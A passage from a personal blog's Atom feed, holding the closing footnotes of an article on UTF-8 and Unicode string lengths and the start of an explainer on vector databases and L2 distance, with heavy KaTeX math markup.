&lt;li id=&quot;fn2&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;This brings us to a classic Unicode sort-of-problem: the string length of &lt;code&gt;👩🏽‍🏫&lt;/code&gt; can fluctuate across languages. Python 3.13 and Ruby 3.2 both say it&#39;s &lt;code&gt;4&lt;/code&gt;. Go 1.23 and in Rust 1.83 both say &lt;code&gt;15&lt;/code&gt;. Node 20.15 says &lt;code&gt;7&lt;/code&gt;. There are perfectly logical and reasonable explanations for all of these results, and also how each language &lt;em&gt;iterates&lt;/em&gt; a string will probably be more relevant for your day-to-day sanity. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref2&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn3&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;In the spec, Unicode favours thinking of this in its hexadecimal form of &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mn&gt;10&lt;/mn&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;msub&gt;&lt;mi&gt;F&lt;/mi&gt;&lt;mn&gt;16&lt;/mn&gt;&lt;/msub&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;10FFFF_{16}&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.83333em;vertical-align:-0.15em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.13889em;&quot;&gt;F&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.13889em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord mtight&quot;&gt;6&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref3&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn4&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;ASCII was actually conceived in the 1960s as a 7-bit encoding, partially because the teletypes and teleprinters of the time were also 7-bit. I love this because, from a 2025 perspective, it&#39;s fascinating to think of addressing blocks of memory in anything less than a byte at a time. &lt;a href=&quot;https://martingaston.dev/articles/the-magic-of-utf8/#fnref4&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/section&gt;
</content>
  </entry>
  <entry>
    <title>What&#39;s a Vector Database Actually Doing?</title>
    <link href="https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/"/>
    <updated>2024-07-16T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/</id>
    <content xml:lang="en" type="html">&lt;p&gt;Vector databases are hot right now. At the end of this article, I hope you&#39;ll have an intuitive feel for what a vector database is actually doing and how it could prove useful when we want to query things that are &lt;em&gt;similar&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This sounds obvious, but a vector database is chiefly concerned with the efficient storage, retrieval and querying of vectors. To me, this makes them intriguingly different to most other database categories which tend to equally embrace a variety of data types - strings, integers, dates, floats and so on.&lt;/p&gt;
&lt;h2 id=&quot;how-does-it-work%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#how-does-it-work%3F&quot;&gt;How Does It Work?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;re going to motivate this with a little bit of maths. It&#39;s fun, I promise.&lt;/p&gt;
&lt;p&gt;Let&#39;s start by considering a pair of points&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn1&quot; id=&quot;fnref1&quot;&gt;[1]&lt;/a&gt;&lt;/sup&gt; on a two-dimensional plane: &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. I&#39;ve selected those because it&#39;s deliciously straightforward to plot them out, and I want this article to be less than 1200 words.&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/basic-cartesian.svg&quot; alt=&quot;three vectors plotted on a basic cartesian plane&quot; /&gt;
&lt;p&gt;Voila! You&#39;ll see those two points in &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;pink&lt;/span&gt;, but I&#39;ve also cheekily added a third point in &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;cyan&lt;/span&gt;: &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. We can see with our own eyes that &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; is much closer to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; than it is &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, but as of July 2024 computers have absolutely zero intuition - so how might we calculate that? One formula we can employ is called the L2 distance&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn2&quot; id=&quot;fnref2&quot;&gt;[2]&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;
&lt;p&gt;If we wanted to calculate the L2 distance, &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, between points &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;p&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;q&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.625em;vertical-align:-0.19444em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; in an abstract &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;n&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.43056em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;n&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-dimensional vector space, we&#39;d do this:&lt;/p&gt;
&lt;p class=&quot;katex-block&quot;&gt;&lt;span class=&quot;katex-display&quot;&gt;&lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot; display=&quot;block&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msqrt&gt;&lt;mrow&gt;&lt;munderover&gt;&lt;mo&gt;∑&lt;/mo&gt;&lt;mrow&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/mrow&gt;&lt;mi&gt;n&lt;/mi&gt;&lt;/munderover&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;q&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;p&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;msup&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;/msqrt&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d(p,q) = &#92;sqrt{&#92;sum_{i=1}^n(q_i - p_i)^2}
&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:3.1568160000000005em;vertical-align:-1.277669em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.8791470000000006em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-5.116816em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:5.116816em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:1.056em;&quot;&gt;&lt;span class=&quot;mop op-limits&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.6513970000000002em;&quot;&gt;&lt;span style=&quot;top:-1.872331em;margin-left:0em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;span class=&quot;mrel mtight&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mord mtight&quot;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.050005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span&gt;&lt;span class=&quot;mop op-symbol large-op&quot;&gt;∑&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-4.3000050000000005em;margin-left:0em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3.05em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;n&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.277669em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.31166399999999994em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.31166399999999994em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mathnormal mtight&quot;&gt;i&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.740108em;&quot;&gt;&lt;span style=&quot;top:-2.9890000000000003em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.8391470000000005em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:5.116816em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; style=&quot;min-width:0.742em;height:3.196816em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;3.196816em&quot; viewBox=&quot;0 0 400000 3196&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M702 80H40000040
H742v3062l-4 4-4 4c-.667.7 -2 1.5-4 2.5s-4.167 1.833-6.5 2.5-5.5 1-9.5 1
h-12l-28-84c-16.667-52-96.667 -294.333-240-727l-212 -643 -85 170
c-4-3.333-8.333-7.667-13 -13l-13-13l77-155 77-156c66 199.333 139 419.667
219 661 l218 661zM702 80H400000v40H742z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:1.277669em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;blockquote&gt;
